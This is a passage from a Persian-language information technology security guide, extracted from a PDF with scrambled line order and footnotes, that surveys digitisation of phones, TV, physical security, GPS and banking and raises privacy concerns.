‫ﻼ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺩﻧﻴـﺎﻱ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺧﺎﻧﮕﻲ ﻧﻴﺰ ﻛﺎﻣ ﹰ‬
‫ﻋﻜﺎﺳﻲ ﻭ ﻓﻴﻠﻤﺒـﺮﺩﺍﺭﻱ ﻧﻴـﺰ ﺗـﺼﺎﻭﻳﺮ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺩﻭﺭﺑﻴﻨﻬـﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺛﺒﺖ ﺗﺼﺎﻭﻳﺮ ﻓﻴﻠﻤﻬﺎﻱ ﻋﻜﺎﺳﻲ ﮔﺸﺘﻪﺍﻧﺪ‪.‬‬
‫‪۱۱‬‬
‫‪Braga, Carlos Prima, Inclusión or Exclusion,‬‬
‫‪UNESCO Courier:‬‬
‫‪http://www.fcc.gov/Bureaus/Miscellaneous/Ne‬‬
‫‪ws_Releases/1997/nrmc7020.html‬‬
‫ﺍﻳﻦ ﻧﺮﺥ ﭘﻴﺸﺮﻓﺖ ﻓﻨﻲ ﻳﻜﻲ ﺍﺯ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗـﺎﻧﻮﻥ ‪ Moor‬ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﻮﺳﻴﻠﺔ ‪ ،Gordon Moor‬ﭘﺪﺭ ﺍﻳﻨﺘﻞ ﺩﺭ ﺩﻫﺔ ‪ ۱۹۶۰‬ﺗﺸﺮﻳﺢ ﺷﺪﻩ‪ .‬ﺍﻭ‬
‫ﻣﻲﮔﻮﻳﺪ ﻃﻲ ﻫﺮ ﺩﻭﺭﺓ ‪ ۲‬ﺳـﺎﻟﻪ )ﻛـﻪ ﺑﻌـﺪﹰﺍ ﺁﻧـﺮﺍ ﺑـﻪ ‪ ۱۸‬ﻣـﺎﻩ ﻛـﺎﻫﺶ ﺩﺍﺩ(‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻳﻲ ﺑـﺎ ﻇﺮﻓﻴـﺖ‬
‫ﺩﻭﺑﺮﺍﺑﺮ ﻭ ﻗﻴﻤﺖ ﻳﻜﺴﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺭﻭﻧﺪ ﻃﻲ ‪ ۴۰‬ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ‬
‫ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ ﺑﻮﺩﻩ ﻭ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺣﺪﺍﻗﻞ ﺗﺎ ‪ ۱۰‬ﺳـﺎﻝ ﺩﻳﮕـﺮ ﻧﻴـﺰ‬
‫ﻫﻤﻴﻨﻄﻮﺭ ﺑﺎﺷﺪ‪.‬‬
‫‪10‬‬
‫‪٢٩‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻠﻔﻨﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭﺣـﺎﻝ ﺣﺮﻛـﺖ ﺑـﻪ ﺳـﻤﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻫﺴﺘﻨﺪ ﻭ ﺑﺎ ﻭﺟﻮﺩ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﭼـﻮﻥ ‪،GSM‬‬
‫‪ TDMA ،CDMA‬ﻭ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻧﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺟﺎﻳﮕﺰﻳﻦ‬
‫ﻧﺴﻞ ﻗﺪﻳﻤﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺁﻧـﺎﻟﻮﮒ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ‪ .‬ﺩﺭ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺗﻠﻮﻳﺰﻳﻮﻥ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻪ ﺻﺤﻨﻪ ﺁﻣﺪﻩ ﺍﺳﺖ‬
‫ﻭ ﺩﻳﺮﻱ ﻧﺨﻮﺍﻫﺪ ﮔﺬﺷﺖ ﻛﻪ ﺟﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﭘﺨﺶ ﺑﺮﻧﺎﻣـﻪ‬
‫ﺭﺍ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ )ﻫﺮﭼﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﻛﻤﻲ ﻛﻨﺪﺗﺮ ﺍﺯ ﺑﻘﻴﻪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ؛‬
‫ﭼﺮﺍﻛﻪ ﺣﺠﻢ ﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻣﻮﺟﻮﺩ ﻛﻪ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ‬
‫ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﺍﺳﺖ(‪.‬‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺗﺒــﺪﻳﻞ ﺑــﻪ ﺍﻧــﻮﺍﻉ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻫﺘﻠﻬﺎ‪ ،‬ﺁﭘﺎﺭﺗﻤﺎﻧﻬـﺎ ﻭ ﺩﻓـﺎﺗﺮ ﺍﺩﺍﺭﻱ‪،‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﺟـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺩﺍﺩﻩ ﺍﻧﺪ‪ .‬ﺩﻭﺭﺑﻴﻨﻬﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻧﻈــﺎﺭﺗﻲ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭ ﺗﺄﺳﻴــﺴﺎﺕ ﻧﻴــﺰ ﺍﻏﻠــﺐ ﺍﺯ ﺗﺠﻬﻴــﺰﺍﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ ﻛـﻪ ﺑﺠـﺎﻱ ﺍﺭﺳـﺎﻝ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ‬
‫ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﺑﻪ ﻳﻚ ﻣﺎﻧﻴﺘﻮﺭ ﻭﻳﺪﺋﻮﻳﻲ‪ ،‬ﺗﺼﺎﻭﻳﺮ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺑـﻪ‬
‫‪١٢‬‬
‫ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﻴﻢ ﺑـﺪﻭﻥ‬
‫ﻭﺟﻮﺩ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺷﺒﻜﻪ ﻭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻗﺎﺑﻞ ﺍﺭﺍﺋﻪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﺧﻄــﻮﻁ ﻫــﻮﺍﻳﻲ ﻧﻴــﺰ ﺑــﺪﻭﻥ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺯﺭﻭ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﺮﻭﺍﺯ ﻗﺎﺩﺭ ﺑﻪ ﺭﻗﺎﺑﺖ ﺑـﺎ ﻫـﻢ‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﻫﻮﺍﭘﻴﻤﺎﻫﺎ ﺗﺎ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺎﺩﻱ ﺑﻪ ﺣﺴﮕﺮﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻭ ﺑﺪﻭﻥ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺧﻮﺑﻲ‬
‫ﻛﺎﺭ ﻛﻨﻨﺪ‪ .‬ﺣﺘﻲ ﺍﺗﻮﻣﺒﻴﻠﻬﺎ ﻧﻴﺰ ﺑﺮﺍﻱ ﻋﻤﻠﻜﺮﺩ ﻣﻨﺎﺳﺐ ﻭ ﻛﻤﻚ ﺑـﻪ‬
‫‪۱۲‬‬
‫اﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺎﻏﻞ ﺭﺍ ﺑﻪ ﺳﻤﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ‪ .‬ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺗﺼﺎﻭﻳﺮ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺠﻴﺘﺎﻝ ﺩﺭﺁﻳﻨﺪ‬
‫ﻭ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈـﺎﺭﺕ ﺩﺭ‬
‫ﻫﺮ ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺑﻨﺎﺑﺮ ﭘﻴﺶﺑﻴﻨﻲﻫﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﻣﻨﻴﺘﻲ‬
‫ﻛﻪ ﺑﻪ ﻣﻬﺎﺭﺕ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﻛﻴﻔﻴﺖ ﺑﺮﺍﺑﺮ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﻮﺩ‪ .‬ﺍﻳـﻦ ﭘﻴـﺸﻨﻬﺎﺩ ﺩﺭ ﺑـﺎ‬
‫ﺍﺳﺘﻘﺒﺎﻝ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻮﺍﺟﻪ ﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ‬
‫ﻭﺍﮔﺬﺍﺭﻱ ﻣﺮﺯﻫﺎﻱ ﻣﻠﻲ ﺩﺭ ﻧﻮﺭﺩﻳﺪﻩ ﻣـﻲﺷـﻮﻧﺪ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺮﺧـﻲ‬
‫ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑـﺎ ﺳـﺮﻋﺘﻲ ﺑـﺎﻭﺭﻧﻜﺮﺩﻧﻲ ﺩﺭ ﺷـﺒﻜﻪ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻗﺎﺩﺭ ﺑـﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺑﺘﺪﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﺻﻮﺕ ﻭ ﺍﻛﻨﻮﻥ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﻣﺒﺎﺩﻟﺔ ﺗﺼﺎﻭﻳﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻲ ﺑﺎﺷـﻨﺪ ﻭ ﺑـﺰﻭﺩﻱ ﺩﺍﺭﺍﻱ‬
‫ﻗﺎﺑﻠﻴﺖ ‪ GPS‬ﻧﻴﺰ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ‬
‫ﻣﻌﺮﺽ ﺧﻄﺮ ﻭ ﺣﺎﺩﺛﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﻗﺘـﻲ‬
‫ﺯﻳﺎﺩ ﻭ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﺗﻠﻔﻦ ﻣﻜﺎﻧﻴﺎﺑﻲ ﻛﺮﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛـﻪ‬
‫ﺍﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺎ ﻗﺮﺍﺭ ﻣـﻲ ﮔﻴﺮﻧـﺪ ‪ -‬ﻣﺜـﻞ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ‬
‫ﺧﻮﺩﭘﺮﺩﺍﺯ ﻛﻪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ ‪-‬‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻞ "ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺷﺒﻜﻪ" ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻧﻘـﻞ ﻭ‬
‫ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻴﺎﻥﺑﺎﻧﻜﻲ ﻭ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺍﺑـﺴﺘﮕﻲ‬
‫ﺯﻳﺎﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻣﺎﻟﻲ ﺩﺍﺭﻧـﺪ‪ ١٤.‬ﺍﻣـﺮﻭﺯﻩ ﻧﻘـﻞ ﻭ‬
‫ﺍﻧﺘﻘﺎﻻﺕ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ‬
‫ﻣﻴﺴﺮ ﺍﺳﺖ‪.‬‬
‫ﻲ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ‬
‫ﺗﻮﺳﻌﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬
‫ﻫﻢ ﻓﻮﺍﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ؛ ﻭﻟـﻲ ﻧﻜـﺎﺕ ﻣﻨﻔـﻲ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﻗﺎﺑـﻞ‬
‫ﻣﺸﺎﻫﺪﻩ ﺍﺳﺖ‪ .‬ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻧﺘﺮ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﻳـﺪﻥ ﺻـﻔﺤﺎﺕ ﺗﺒﻠﻴﻐـﺎﺗﻲ ﻭﺏ‪ ،‬ﻳـﺎﻓﺘﻦ ﺁﻧﭽـﻪ ﻛـﻪ‬
‫ﺑﺪﻧﺒﺎﻝ ﺧﺮﻳﺪ ﺁﻥ ﺩﺭ ﻣﻐـﺎﺯﻩﻫـﺎ ﻫـﺴﺘﻴﺪ‪ ،‬ﻭ ﻣـﺸﺎﻫﺪﺓ ﺁﻧﭽـﻪ ﻛـﻪ‬
‫ﺩﺭﺣﺎﻝ ﺗﻤﺎﺷﺎ ﻳﺎ ﺧﻮﺍﻧﺪﻥ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﻫﺴﺘﻴﺪ ﻧﻴﺰ ﺳـﺎﺩﻩﺗـﺮ ﺍﺯ‬
‫ﻗﺒﻞ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﻈﺎﺭﺗﻲ ﺑـﺮ ﻣﻨـﺎﻓﻊ ﺷـﻤﺎ ﺣـﺎﻛﻢ ﺑﺎﺷـﺪ‬
‫ﻗﺎﻋﺪﺗﹰﺎ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﺑـﺎﺧﺒﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ ﺷـﻤﺎ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﻛـﻪ ﺍﺯ‬
‫‪Global Positioning System‬‬
‫‪۱۴‬‬
‫ﺷﺒﻜﺔ ﺗﺒﺎﺩﻝ ﻣﺎﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺧﺘـﺼﺎﺻﻲ‬
‫ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﻴﻦ ﻫﺪﻑ ﺧﺎﺹ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ ﺑـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﺘﺼﻞ ﻧﺒﻮﺩ‪ .‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ‬
‫ﺍﺭﺯﺵ ﺯﻳﺎﺩ ﺁﻥ ﺷﺒﻜﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﻭ ﺟﺪﻱ ﻫﺮﮔﻮﻧـﻪ ﻧﻔـﻮﺫ‬
‫ﺑﻪ ﺁﻥ ﻛﺎﻣ ﹰ‬
‫ﻼ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ‪.‬‬
‫‪13‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺍﻣــﺮﻭﺯ ﺣﺘــﻲ ﻓﻴﻠﻤﻬــﺎﻱ ﺳــﻴﻨﻤﺎﻳﻲ ﻭ ﻛﺎﺭﺗﻮﻧﻬــﺎ ﻧﻴــﺰ ﺩﻳﺠﻴﺘــﺎﻟﻲ‬
‫ﺷﺪﻩﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺑﺪﻳﻦ ﺷﻜﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺗﻮﻟﻴـﺪ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﻭ‬
‫ﻛﻴﻔﻴﺘﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺳﺖ‪ .‬ﺭﻓﺘﻪ ﺭﻓﺘﻪ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺟﺎﻱ ﺧـﻮﺩ‬
‫ﺭﺍ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ‪ DVD‬ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻓﻴﻠﻤﻬﺎﻱ ﺳﻴﻨﻤﺎﻳﻲ ﺑـﺎ ﺍﻣﻜﺎﻧـﺎﺕ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﺎﺧﺘﻪ ﻭ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫ﻋﻴﺐﻳﺎﺑﻲ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ )‪ ١٣(GPS‬ﻧﻴﺰ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜـﺎﻥ‬
‫ﺭﺍ ﻣﻲ ﺩﻫﻨﺪ ﻛﻪ ﺑﺪﺍﻧﻴﺪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﺩﺭ ﭼـﻪ ﻣﻜـﺎﻧﻲ ﺭﻭﻱ ﻛـﺮﺓ‬
‫ﺯﻣﻴﻦ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﻭ ﺑﺎ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻧـﻲ ﺩﺭ‬
‫ﻛﻨﺎﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺍﺯ ﻧﻘﺸﻪﻫﺎ ﺑﺎﺷﺪ ﻗﺎﺩﺭ ﺑﻪ‬
‫ﻳﺎﻓﺘﻦ ﻣﺴﻴﺮ ﺣﺮﻛﺖ‪ ،‬ﻧﻘﺎﻁ ﻣﻬﻢ‪ ،‬ﺭﺳﺘﻮﺭﺍﻧﻬﺎ‪ ،‬ﺗﺎﺑﻠﻮﻫـﺎﻱ ﺭﺍﻫﻨﻤـﺎ‪،‬‬
‫ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ‪ ،‬ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈـﺮ‬
‫ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‪.‬‬
‫‪٣٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺁﻥ ﻣﻮﺍﻓﻖ ﻫﺴﺘﻴﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺑـﺮﺍﻱ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ ﻭ ﺩﻭﻟﺘﻬﺎ ﻧﻴـﺰ‬
‫ﻣﺎﻳﻞ ﺑﻪ ﺣﻔﻆ ﺣﻘﻮﻕ ﺍﻓﺮﺍﺩ ﻣﻲﺑﺎﺷـﻨﺪ‪ ،‬ﮔﺮﭼـﻪ ﻣﻴـﺰﺍﻥ ﻭ ﺷـﺪﺕ‬
‫ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺗـﺎ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ‪.‬‬
‫ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻨـﺎﻓﻊ ﺣﺎﺻـﻞ ﺍﺯ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻧﻮﻇﻬﻮﺭ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﺭﺯﺷﻬﺎ ﻭ‬
‫ﺁﺯﺍﺩﻳﻬﺎﻳﻲ ﻛﻪ ﺑﺪﻭﻥ ﺁﻥ ﻓﻨﺎﻭﺭﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑـﻮﺩ‬
‫ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﻨﻨﺪ‪ .‬ﻣﻮﺿﻮﻉ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺗﺄﺛﻴﺮ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻭ ﺍﻣﻜﺎﻧﺎﺕ ﻧﻮﻳﻦ‬
